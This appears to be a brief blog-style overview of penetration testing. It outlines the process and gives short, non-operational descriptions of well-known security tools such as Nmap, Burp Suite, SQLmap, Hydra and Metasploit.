What is pen testing?

Penetration testing [ Pen Test] is a test performed by ethical hackers to determine if a system is vulnerable to attacks. In other words if the tested systems defenses were enough and which defenses the test overcome. Majority of pros will use some specific tools to complete the job.

How a pen test is done?

Step-by-step:

A list of potential issues/ vulnerabilities is created, that could become a security breach for a particular system. Ideally it is sorted by priority / most critical Elaborate a plan with pentests that would be performed within internal network and externally in order to check network, data, server can be accessed unauthorized. If it was possible to get unauthorized access, next step would be to fix the system and re-do the pentest with the goal to fix the issues.

Below list are those used day to day, while some of them require a license, most of them are free.

Nmap

OWASP ZAP

Wifiphisher

Burp Suite

Aircrack-ng

CME (CrackMapExec)

SQLmap

PowerSploit

Impacket

BeEF (Browser Exploitation Framework)

THC-Hydra

Social Engineer Toolkit (SET)

Luckystrike

Metasploit

Network Mapper (Nmap) was first released 20 years ago and it is a security scanner with capabilities ranging from probing networks to OS detection, spoofing, and the features are extensible by scripts to provide more sophisticated service detection, vulnerabilities detection, etc.

The OWASP Zed Attack Proxy (ZAP) allows to automatically find security vulnerabilities in your web apps during the development and testing. Used by experienced pentesters for manual security testing.

This is an effective access point tool for linux that enables automated phishing attacks against WiFi networks by harvesting credential or execute actual infection. Detailed documentation is available on Wifiphisher website.

Burp is a graphical tool written in Java for testing web apps security. The free version is limited, but the paid version offers a set of advanced solutions for web application security checks

This is another well knows day to day complete suite of tools for assessing WiFi networks. It’s focus is on monitoring ( packet capture and export of data to text files ), attacking (replay attacks, deauthentication, fake access points and others via packet injection), testing ( checking WiFi cards and driver capabilities), cracking (WEP and WPA PSK). Aircrack-ng is a fork of the original Aircrack project.

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

An open source penetration testing tool that does the following:

automates the process of detecting and exploiting SQL injection flaws

taking over of database servers.

It is packed with a powerful detection engine, a lot of features for the professional penetration testers and a big range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

PowerSploit is a series of Microsoft PowerShell scripts that can be used in post-exploitation scenarios during authorized penetration tests.

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering.

A PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.

Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing and thanks to the open source community and Rapid7’s own hard working content team, new modules are added on a regular basis, which means that the latest exploit is available to you as soon as it’s published.